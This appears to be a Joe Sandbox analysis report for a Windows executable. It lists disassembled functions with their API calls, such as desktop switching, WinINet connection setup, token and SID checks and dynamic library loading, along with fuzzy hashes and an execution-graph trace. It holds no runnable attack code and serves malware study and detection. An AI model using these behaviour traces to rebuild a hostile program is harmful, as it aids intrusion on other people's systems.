                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHandleType
                                                                                        • String ID: @
                                                                                        • API String ID: 3000768030-2766056989
                                                                                        • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                        • Instruction ID: 4dce042e9b64fa5a5243e88ae067c69ab720df81be8d155532ca631fcfcdbc1d
                                                                                        • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                        • Instruction Fuzzy Hash: 7E219A22E0864641EB64CB26999013A6E51FBE5774F281336E67F877D4EE3DE881C301
                                                                                        Function 00007FF6FE1B4078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FE1B1D3E), ref: 00007FF6FE1B40BC
                                                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FE1B1D3E), ref: 00007FF6FE1B4102
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                        • String ID: csm
                                                                                        • API String ID: 2573137834-1018135373
                                                                                        • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                        • Instruction ID: 9468362a24214777daa566dcdf50b15219a45997e5140564cfc0ff8077f1820c
                                                                                        • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                        • Instruction Fuzzy Hash: BE112B32E08B4182EB20CF16E4402AD7BA1FB98B94F188231EE9D47794EF3CD965C700
                                                                                        Function 00007FF6FE19EA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6FE19E95F,?,?,?,00007FF6FE19463A,?,?,?), ref: 00007FF6FE19EA63
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6FE19E95F,?,?,?,00007FF6FE19463A,?,?,?), ref: 00007FF6FE19EA6E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastObjectSingleWait
                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                        • API String ID: 1211598281-2248577382
                                                                                        • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                        • Instruction ID: ca59950417c05fdf5538bfb8c23fa15746e21519ffe554b2b361e8dfd7e2e7e8
                                                                                        • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                        • Instruction Fuzzy Hash: 1AE07569E19C4281E710EB669C865A92A517FF5760FA45331F03EC15F5BF2CAA4A8201
                                                                                        Function 00007FF6FE19A43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindHandleModuleResource
                                                                                        • String ID: RTL
                                                                                        • API String ID: 3537982541-834975271
                                                                                        • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                        • Instruction ID: ee104fd3a10934ba6706083cdad582aff0c849d14b175946c2757195234ba0b9
                                                                                        • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                        • Instruction Fuzzy Hash: C6D05B91F0964185FF19C77754453B42A905F68B41F484038D85DC63D4FE2DE098C750

                                                                                        Execution Graph

                                                                                        Execution Coverage:6.4%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:14.7%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:102
                                                                                        execution_graph 54230 11108d30 54273 1110f420 54230->54273 54233 11108da9 OpenEventA 54236 11108ed1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 54233->54236 54237 11108e18 CloseHandle GetSystemDirectoryA 54233->54237 54238 1110f420 std::locale::facet::_Facet_Register 307 API calls 54236->54238 54239 11108e38 54237->54239 54240 11108f23 54238->54240 54239->54239 54241 11108e40 LoadLibraryA 54239->54241 54242 11108f3c 54240->54242 54344 110f4680 310 API calls std::locale::facet::_Facet_Register 54240->54344 54241->54236 54243 11108e71 54241->54243 54301 1110f2b0 54242->54301 54317 111450a0 54243->54317 54247 11108e7b 54248 11108e82 GetProcAddress 54247->54248 54249 11108e9a GetProcAddress 54247->54249 54248->54249 54251 11108ec4 FreeLibrary 54249->54251 54252 11108eb6 54249->54252 54251->54236 54252->54236 54255 11109005 54347 11161d01 54255->54347 54256 1110f420 std::locale::facet::_Facet_Register 307 API calls 54258 11108f73 54256->54258 54260 11108f84 54258->54260 54261 11108f8d 54258->54261 54259 1110901f 54345 110f4680 310 API calls std::locale::facet::_Facet_Register 54260->54345 54263 1110f2b0 451 API calls 54261->54263 54264 11108fa9 CloseHandle 54263->54264 54265 111450a0 std::locale::facet::_Facet_Register 121 API calls 54264->54265 54266 11108fba 54265->54266 54266->54255 54267 1110f420 std::locale::facet::_Facet_Register 307 API calls 54266->54267 54268 11108fc8 54267->54268 54270 11108fe2 54268->54270 54346 110f4680 310 API calls std::locale::facet::_Facet_Register 54268->54346 54271 1110f2b0 451 API calls 54270->54271 54272 11108ffe CloseHandle 54271->54272 54272->54255 54355 11162b51 54273->54355 54276 1110f473 _memset 54280 11161d01 __87except 5 API calls 54276->54280 54277 1110f447 wsprintfA 54372 11029450 307 API calls 2 library calls 54277->54372 54281 11108d91 54280->54281 54281->54233 54282 11107290 54281->54282 54381 1110f520 54282->54381 54285 1110f520 3 API calls 54286 111072dc 54285->54286 54287 1110f520 3 API calls 54286->54287 54288 111072ee 54287->54288 54289 1110f520 3 API calls 54288->54289 54290 111072ff 54289->54290 54291 1110f520 3 API calls 54290->54291 54292 11107310 54291->54292 54293 1110f420 std::locale::facet::_Facet_Register 307 API calls 54292->54293 54294 11107321 54293->54294 54295 1110740a 54294->54295 54296 1110732c LoadLibraryA LoadLibraryA 54294->54296 54388 1116219a 67 API calls std::exception::_Copy_str 54295->54388 54296->54233 54298 11107419 54389 111625f1 RaiseException 54298->54389 54300 1110742e 54302 1110f2d0 CreateThread 54301->54302 54303 1110f2bf CreateEventA 54301->54303 54305 1110f2f6 54302->54305 54306 1110f30d 54302->54306 54393 11102c50 54302->54393 54415 1110fde0 54302->54415 54429 11027270 54302->54429 54454 1102c410 54302->54454 54303->54302 54392 11029450 307 API calls 2 library calls 54305->54392 54308 1110f311 WaitForSingleObject CloseHandle 54306->54308 54309 11108f58 CloseHandle 54306->54309 54308->54309 54311 1109e9e0 54309->54311 54312 1109e9ef GetCurrentProcess OpenProcessToken 54311->54312 54313 1109ea2d 54311->54313 54312->54313 54314 1109ea12 54312->54314 54313->54255 54313->54256 54827 1109e910 54314->54827 54316 1109ea1b CloseHandle 54316->54313 54318 111450c1 GetVersionExA 54317->54318 54327 1114529c 54317->54327 54319 111450e3 54318->54319 54318->54327 54321 111450f0 RegOpenKeyExA 54319->54321 54319->54327 54320 111452a5 54322 11161d01 __87except 5 API calls 54320->54322 54323 1114511d _memset 54321->54323 54321->54327 54324 111452b2 54322->54324 54840 11143000 RegQueryValueExA 54323->54840 54324->54247 54325 11145304 54326 11161d01 __87except 5 API calls 54325->54326 54328 11145314 54326->54328 54327->54320 54327->54325 54847 11081c60 116 API calls 2 library calls 54327->54847 54328->54247 54332 111452ec 54332->54320 54332->54325 54333 11143000 std::locale::facet::_Facet_Register RegQueryValueExA 54335 11145189 54333->54335 54334 1114528f RegCloseKey 54334->54327 54335->54334 54842 11163a2d 54335->54842 54337 111451ad 54338 11163a2d std::locale::facet::_Facet_Register 106 API calls 54337->54338 54339 111451c6 _strncpy 54337->54339 54338->54337 54340 11143000 std::locale::facet::_Facet_Register RegQueryValueExA 54339->54340 54343 11145271 54339->54343 54341 11145248 54340->54341 54342 11143000 std::locale::facet::_Facet_Register RegQueryValueExA 54341->54342 54342->54343 54343->54334 54344->54242 54345->54261 54346->54270 54348 11161d0b IsDebuggerPresent 54347->54348 54349 11161d09 54347->54349 54849 11177637 54348->54849 54349->54259 54352 1116bc99 SetUnhandledExceptionFilter UnhandledExceptionFilter 54353 1116bcb6 __call_reportfault 54352->54353 54354 1116bcbe GetCurrentProcess TerminateProcess 54352->54354 54353->54354 54354->54259 54356 11162bce 54355->54356 54360 11162b5f 54355->54360 54379 1116d4a8 DecodePointer 54356->54379 54358 11162bd4 54380 111692ef 67 API calls __getptd_noexit 54358->54380 54362 11162b6a 54360->54362 54363 11162b8d RtlAllocateHeap 54360->54363 54366 11162bba 54360->54366 54370 11162bb8 54360->54370 54376 1116d4a8 DecodePointer 54360->54376 54362->54360 54373 1116d99d 67 API calls 2 library calls 54362->54373 54374 1116d7ee 67 API calls 7 library calls 54362->54374 54375 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 54362->54375 54363->54360 54364 1110f43e 54363->54364 54364->54276 54364->54277 54377 111692ef 67 API calls __getptd_noexit 54366->54377 54378 111692ef 67 API calls __getptd_noexit 54370->54378 54373->54362 54374->54362 54376->54360 54377->54370 54378->54364 54379->54358 54380->54364 54382 1110f536 CreateEventA 54381->54382 54383 1110f549 54381->54383 54382->54383 54384 1110f557 54383->54384 54390 1110f260 InterlockedIncrement 54383->54390 54386 111072cc 54384->54386 54391 1110f3c0 InterlockedIncrement 54384->54391 54386->54285 54388->54298 54389->54300 54390->54384 54391->54386 54489 11089280 54393->54489 54395 11102c5d 54396 11102c69 GetCurrentThreadId GetThreadDesktop OpenDesktopA 54395->54396 54397 11102ccf GetLastError 54396->54397 54398 11102c8f SetThreadDesktop 54396->54398 54401 11146450 std::locale::facet::_Facet_Register 21 API calls 54397->54401 54399 11102cb1 GetLastError 54398->54399 54400 11102c9a 54398->54400 54403 11146450 std::locale::facet::_Facet_Register 21 API calls 54399->54403 54500 11146450 54400->54500 54404 11102ce1 54401->54404 54406 11102cc3 CloseDesktop 54403->54406 54494 11102bd0 54404->54494 54406->54404 54408 11102ceb 54506 1110f340 54408->54506 54410 11102cf2 54511 110f4740 16 API calls 54410->54511 54412 11102cf9 54512 1110f370 SetEvent PulseEvent 54412->54512 54414 11102d00 54565 110b7a20 54415->54565 54417 1110fdee GetCurrentThreadId 54418 1110f340 308 API calls 54417->54418 54427 1110fe09 54418->54427 54419 1110fe80 54569 1110f370 SetEvent PulseEvent 54419->54569 54421 1110fe20 WaitForSingleObject 54567 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 54421->54567 54422 1110fe8a 54424 1110fe43 54425 1110fe53 PostMessageA 54424->54425 54426 1110fe58 PostThreadMessageA 54424->54426 54425->54427 54426->54427 54427->54419 54427->54421 54427->54424 54568 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 54427->54568 54430 110272a2 54429->54430 54431 11089280 5 API calls 54430->54431 54432 110272a9 CreateEventA 54431->54432 54433 1110f420 std::locale::facet::_Facet_Register 307 API calls 54432->54433 54434 110272c6 54433->54434 54435 110272e7 54434->54435 54570 111100d0 54434->54570 54437 1110f340 308 API calls 54435->54437 54445 110272ff 54437->54445 54438 11027316 WaitForMultipleObjects 54439 1102732d 54438->54439 54438->54445 54440 11027336 PostMessageA 54439->54440 54441 1102734a SetEvent Sleep 54439->54441 54440->54441 54440->54445 54441->54445 54442 110273f4 54443 1102740e CloseHandle 54442->54443 54599 1110fc70 320 API calls std::locale::facet::_Facet_Register 54442->54599 54600 1110f370 SetEvent PulseEvent 54443->54600 54444 11027375 PostMessageA 54444->54445 54445->54438 54445->54442 54445->54444 54451 110273ba GetCurrentThreadId GetThreadDesktop 54445->54451 54598 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 54445->54598 54448 11027423 54450 11027405 54450->54443 54451->54445 54452 110273c9 SetThreadDesktop 54451->54452 54452->54445 54453 110273d4 CloseDesktop 54452->54453 54453->54445 54455 1102c442 54454->54455 54456 1110f340 308 API calls 54455->54456 54457 1102c44f WaitForSingleObject 54456->54457 54458 1102c466 54457->54458 54459 1102c67d 54457->54459 54461 1102c470 GetTickCount 54458->54461 54462 1102c666 WaitForSingleObject 54458->54462 54698 1110f370 SetEvent PulseEvent 54459->54698 54604 110d1550 54461->54604 54462->54458 54462->54459 54463 1102c684 CloseHandle 54699 1110f580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 54463->54699 54466 1102c695 54467 110d1550 307 API calls 54478 1102c486 54467->54478 54469 1102c6b4 54700 11029450 307 API calls 2 library calls 54469->54700 54471 1102c6c8 54701 11029450 307 API calls 2 library calls 54471->54701 54473 1102c6dc 54702 11029450 307 API calls 2 library calls 54473->54702 54476 1102c6f0 54703 11029450 307 API calls 2 library calls 54476->54703 54477 1102c574 GetTickCount 54484 1102c571 54477->54484 54478->54467 54478->54469 54478->54471 54478->54473 54478->54477 54614 110d0710 54478->54614 54626 11029590 LoadLibraryA 54478->54626 54680 110d1370 308 API calls 2 library calls 54478->54680 54482 11146450 std::locale::facet::_Facet_Register 21 API calls 54482->54484 54483 110d07c0 308 API calls 54483->54484 54484->54469 54484->54471 54484->54476 54484->54477 54484->54482 54484->54483 54487 110679c0 323 API calls 54484->54487 54681 11142290 54484->54681 54690 11042530 310 API calls std::locale::facet::_Facet_Register 54484->54690 54691 110d07c0 54484->54691 54487->54484 54513 1110f6c0 54489->54513 54491 11089290 54492 110892b3 54491->54492 54493 110892a2 UnhookWindowsHookEx 54491->54493 54492->54395 54493->54492 54495 1110f420 std::locale::facet::_Facet_Register 307 API calls 54494->54495 54497 11102bfd 54495->54497 54496 11102c30 54496->54408 54497->54496 54519 11102ab0 54497->54519 54499 11102c1d 54499->54408 54501 11146461 54500->54501 54502 1114645c 54500->54502 54539 111458f0 54501->54539 54542 111456a0 18 API calls std::locale::facet::_Facet_Register 54502->54542 54507 1110f360 SetEvent 54506->54507 54508 1110f349 54506->54508 54507->54410 54564 11029450 307 API calls 2 library calls 54508->54564 54511->54412 54512->54414 54514 1110f6d7 EnterCriticalSection 54513->54514 54515 1110f6ce GetCurrentThreadId 54513->54515 54516 1110f6ee ___DllMainCRTStartup 54514->54516 54515->54514 54517 1110f6f5 LeaveCriticalSection 54516->54517 54518 1110f708 LeaveCriticalSection 54516->54518 54517->54491 54518->54491 54526 1115f550 54519->54526 54522 11102b81 CreateWindowExA 54522->54499 54523 11102b17 std::locale::facet::_Facet_Register 54524 11102b50 GetStockObject RegisterClassA 54523->54524 54524->54522 54525 11102b7a 54524->54525 54525->54522 54529 1115e380 GlobalAddAtomA 54526->54529 54530 1115e3b5 GetLastError wsprintfA 54529->54530 54531 1115e407 GlobalAddAtomA GlobalAddAtomA 54529->54531 54538 11029450 307 API calls 2 library calls 54530->54538 54533 11161d01 __87except 5 API calls 54531->54533 54535 11102ae1 GlobalAddAtomA 54533->54535 54535->54522 54535->54523 54543 111457a0 54539->54543 54541 11102ca5 CloseDesktop 54541->54404 54542->54501 54544 111457c4 54543->54544 54545 111457c9 54543->54545 54563 111456a0 18 API calls std::locale::facet::_Facet_Register 54544->54563 54547 11145832 54545->54547 54551 111457d2 54545->54551 54548 111458de 54547->54548 54549 1114583f wsprintfA 54547->54549 54552 11161d01 __87except 5 API calls 54548->54552 54553 11145862 54549->54553 54550 11145809 54557 11161d01 __87except 5 API calls 54550->54557 54551->54550 54554 111457e0 54551->54554 54555 111458ea 54552->54555 54553->54553 54556 11145869 wvsprintfA 54553->54556 54559 11161d01 __87except 5 API calls 54554->54559 54555->54541 54562 11145884 54556->54562 54558 1114582e 54557->54558 54558->54541 54560 11145805 54559->54560 54560->54541 54561 111458d1 OutputDebugStringA 54561->54548 54562->54561 54562->54562 54563->54545 54566 110b7a28 std::locale::facet::_Facet_Register 54565->54566 54566->54417 54567->54427 54568->54427 54569->54422 54571 1110f420 std::locale::facet::_Facet_Register 307 API calls 54570->54571 54572 11110101 54571->54572 54573 11110123 GetCurrentThreadId InitializeCriticalSection 54572->54573 54575 1110f420 std::locale::facet::_Facet_Register 307 API calls 54572->54575 54576 11110190 EnterCriticalSection 54573->54576 54577 11110183 InitializeCriticalSection 54573->54577 54578 1111011c 54575->54578 54579 1111024a LeaveCriticalSection 54576->54579 54580 111101be CreateEventA 54576->54580 54577->54576 54578->54573 54601 1116219a 67 API calls std::exception::_Copy_str 54578->54601 54579->54435 54582 111101d1 54580->54582 54583 111101e8 54580->54583 54603 11029450 307 API calls 2 library calls 54582->54603 54586 1110f420 std::locale::facet::_Facet_Register 307 API calls 54583->54586 54584 1111013f 54602 111625f1 RaiseException 54584->54602 54589 111101ef 54586->54589 54590 1111020c 54589->54590 54591 111100d0 445 API calls 54589->54591 54592 1110f420 std::locale::facet::_Facet_Register 307 API calls 54590->54592 54591->54590 54593 1111021c 54592->54593 54594 1110f520 3 API calls 54593->54594 54595 1111022d 54593->54595 54594->54595 54596 1110f2b0 445 API calls 54595->54596 54597 11110245 54596->54597 54597->54579 54598->54445 54599->54450 54600->54448 54601->54584 54602->54573 54704 110d1480 54604->54704 54607 110d159b 54609 110d15b5 54607->54609 54610 110d1598 54607->54610 54608 110d1584 54718 11029450 307 API calls 2 library calls 54608->54718 54609->54478 54610->54607 54719 11029450 307 API calls 2 library calls 54610->54719 54615 110d0724 54614->54615 54759 11163cf8 54615->54759 54622 110d077c 54622->54478 54623 110d0765 54784 11029450 307 API calls 2 library calls 54623->54784 54673 11029621 54626->54673 54627 11029653 GetProcAddress 54631 11029671 SetLastError 54627->54631 54627->54673 54628 11162b51 _malloc 67 API calls 54628->54673 54629 11029748 InternetOpenA 54633 11029784 _free 54629->54633 54630 1102972f GetProcAddress 54630->54629 54632 11029779 SetLastError 54630->54632 54631->54673 54632->54633 54633->54673 54634 110296a5 GetProcAddress 54635 11029762 SetLastError 54634->54635 54634->54673 54637 110296d2 GetLastError 54635->54637 54636 11142290 std::locale::facet::_Facet_Register 307 API calls 54636->54673 54638 110296dd _free 54637->54638 54637->54673 54640 11162b51 _malloc 67 API calls 54638->54640 54639 11029a40 54646 11029b76 GetProcAddress 54639->54646 54647 11029a31 54639->54647 54640->54673 54641 110296f5 GetProcAddress 54644 1102976f SetLastError 54641->54644 54641->54673 54642 11029bb0 54642->54484 54643 11029ba9 FreeLibrary 54643->54642 54644->54673 54645 11029a57 GetProcAddress 54648 11029b2e SetLastError 54645->54648 54651 11029a1a 54645->54651 54646->54647 54649 11029b97 SetLastError 54646->54649 54647->54642 54647->54643 54670 11029b36 54648->54670 54649->54647 54650 11081a70 IsDBCSLeadByte 54650->54673 54651->54639 54651->54645 54651->54647 54668 11029a88 54651->54668 54651->54670 54653 11029b5b 54819 110278a0 GetProcAddress SetLastError 54653->54819 54656 110297ff GetProcAddress 54660 1102981c SetLastError 54656->54660 54656->54673 54657 1102982b GetProcAddress 54658 1102983e InternetConnectA 54657->54658 54662 11029881 SetLastError 54657->54662 54658->54673 54659 11029b6a 54659->54639 54660->54673 54662->54673 54663 11029864 GetProcAddress 54665 11029891 SetLastError 54663->54665 54663->54673 54664 110298a3 GetProcAddress 54666 110298d6 SetLastError 54664->54666 54664->54673 54665->54673 54666->54673 54667 110d1090 307 API calls 54667->54668 54668->54651 54668->54667 54668->54670 54810 1110f4a0 54668->54810 54817 11027850 GetProcAddress SetLastError 54668->54817 54669 110298f1 GetProcAddress 54671 11029918 SetLastError 54669->54671 54669->54673 54818 110278a0 GetProcAddress SetLastError 54670->54818 54672 11029922 GetLastError 54671->54672 54672->54673 54674 1102993d GetProcAddress 54672->54674 54673->54627 54673->54628 54673->54629 54673->54630 54673->54634 54673->54636 54673->54637 54673->54641 54673->54650 54673->54651 54673->54656 54673->54657 54673->54658 54673->54663 54673->54664 54673->54669 54673->54672 54676 11029975 GetLastError 54673->54676 54677 1102998c GetDesktopWindow 54673->54677 54674->54673 54675 1102996d SetLastError 54674->54675 54675->54676 54676->54673 54676->54677 54677->54673 54678 1102999a GetProcAddress 54677->54678 54678->54673 54679 110299d6 SetLastError 54678->54679 54679->54673 54680->54478 54682 1114229a 54681->54682 54683 1114229c 54681->54683 54682->54484 54684 1110f4a0 std::locale::facet::_Facet_Register 307 API calls 54683->54684 54685 111422c2 54684->54685 54686 111422cb _strncpy 54685->54686 54687 111422e9 54685->54687 54686->54484 54821 11029450 307 API calls 2 library calls 54687->54821 54690->54484 54822 110d05c0 54691->54822 54694 110d07e9 _free 54694->54462 54695 110d07d2 54826 11029450 307 API calls 2 library calls 54695->54826 54698->54463 54699->54466 54705 110d148c 54704->54705 54706 110d14a7 54705->54706 54707 110d1490 54705->54707 54720 110d0190 54706->54720 54749 11029450 307 API calls 2 library calls 54707->54749 54714 110d14de 54714->54607 54714->54608 54715 110d14c7 54750 11029450 307 API calls 2 library calls 54715->54750 54721 110d0199 54720->54721 54722 110d019d 54721->54722 54723 110d01b4 54721->54723 54751 11029450 307 API calls 2 library calls 54722->54751 54725 110d01b1 54723->54725 54726 110d01e8 54723->54726 54725->54723 54752 11029450 307 API calls 2 library calls 54725->54752 54728 110d01e5 54726->54728 54729 110d0206 54726->54729 54728->54726 54753 11029450 307 API calls 2 library calls 54728->54753 54732 110d1090 54729->54732 54733 110d109e 54732->54733 54734 110d10a2 54733->54734 54738 110d10b9 54733->54738 54754 11029450 307 API calls 2 library calls 54734->54754 54736 110d1160 54736->54714 54736->54715 54737 110d10ec 54737->54736 54756 110d09e0 307 API calls std::locale::facet::_Facet_Register 54737->54756 54738->54737 54739 110d10b6 54738->54739 54739->54738 54755 11029450 307 API calls 2 library calls 54739->54755 54742 110d1113 54745 110d111f _memmove 54742->54745 54757 110d0920 307 API calls std::locale::facet::_Facet_Register 54742->54757 54745->54736 54746 110d1149 54745->54746 54758 11029450 307 API calls 2 library calls 54746->54758 54756->54742 54757->54745 54760 110d072f 54759->54760 54761 11163d09 _strlen 54759->54761 54767 110d0450 54760->54767 54762 11162b51 _malloc 67 API calls 54761->54762 54763 11163d1c 54762->54763 54763->54760 54785 1116be9f 54763->54785 54768 110d045b 54767->54768 54769 110d0472 54767->54769 54806 11029450 307 API calls 2 library calls 54768->54806 54772 110cfe70 54769->54772 54773 110cfe7d 54772->54773 54774 110cfe98 54773->54774 54775 110cfe81 54773->54775 54777 110cfe95 54774->54777 54779 110cfeb6 54774->54779 54807 11029450 307 API calls 2 library calls 54775->54807 54777->54774 54808 11029450 307 API calls 2 library calls 54777->54808 54780 110cfeb3 54779->54780 54783 110cfed9 54779->54783 54780->54779 54809 11029450 307 API calls 2 library calls 54780->54809 54783->54622 54783->54623 54786 1116beb4 54785->54786 54787 1116bead 54785->54787 54797 111692ef 67 API calls __getptd_noexit 54786->54797 54787->54786 54790 1116bed2 54787->54790 54791 11163d2e 54790->54791 54799 111692ef 67 API calls __getptd_noexit 54790->54799 54791->54760 54794 1116deb2 54791->54794 54793 1116beb9 54798 1116df04 11 API calls __filbuf 54793->54798 54800 1116dd89 54794->54800 54797->54793 54798->54791 54799->54793 54801 1116dda8 _memset __call_reportfault 54800->54801 54802 1116ddc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 54801->54802 54803 1116de94 __call_reportfault 54802->54803 54804 11161d01 __87except 5 API calls 54803->54804 54805 1116deb0 GetCurrentProcess TerminateProcess 54804->54805 54805->54760 54811 11162b51 _malloc 67 API calls 54810->54811 54812 1110f4ae 54811->54812 54813 1110f4b7 54812->54813 54814 1110f4ce _memset 54812->54814 54820 11029450 307 API calls 2 library calls 54813->54820 54814->54668 54817->54668 54818->54653 54819->54659 54823 110d05d9 54822->54823 54824 110d05ec 54822->54824 54823->54824 54825 110d0450 307 API calls 54823->54825 54824->54694 54824->54695 54825->54824 54828 1109e930 GetTokenInformation 54827->54828 54833 1109e9c6 54827->54833 54830 1109e952 __crtLCMapStringA_stat 54828->54830 54829 11161d01 __87except 5 API calls 54831 1109e9d8 54829->54831 54832 1109e958 GetTokenInformation 54830->54832 54830->54833 54831->54316 54832->54833 54834 1109e96a 54832->54834 54833->54829 54835 1109e99f EqualSid 54834->54835 54836 1109e973 AllocateAndInitializeSid 54834->54836 54835->54833 54837 1109e9ad 54835->54837 54836->54833 54836->54835 54838 11161d01 __87except 5 API calls 54837->54838 54839 1109e9c2 54838->54839 54839->54316 54841 1114302a 54840->54841 54841->54333 54843 11163a4d 54842->54843 54844 11163a3b 54842->54844 54848 111639dc 106 API calls _LocaleUpdate::_LocaleUpdate 54843->54848 54844->54337 54846 11163a57 54846->54337 54847->54332 54848->54846 54849->54352 54850 11115b70 54868 11145320 54850->54868 54853 11115bb5 54854 11115b98 54853->54854 54855 11115bc4 CoInitialize CoCreateInstance 54853->54855 54856 11161d01 __87except 5 API calls 54854->54856 54858 11115bf4 LoadLibraryA 54855->54858 54867 11115be9 54855->54867 54859 11115ba6 54856->54859 54857 111450a0 std::locale::facet::_Facet_Register 121 API calls 54857->54853 54860 11115c10 GetProcAddress 54858->54860 54858->54867 54863 11115c20 SHGetSettings 54860->54863 54864 11115c34 FreeLibrary 54860->54864 54861 11115cd1 CoUninitialize 54862 11115cd7 54861->54862 54865 11161d01 __87except 5 API calls 54862->54865 54863->54864 54864->54867 54866 11115ce6 54865->54866 54867->54861 54867->54862 54869 111450a0 std::locale::facet::_Facet_Register 121 API calls 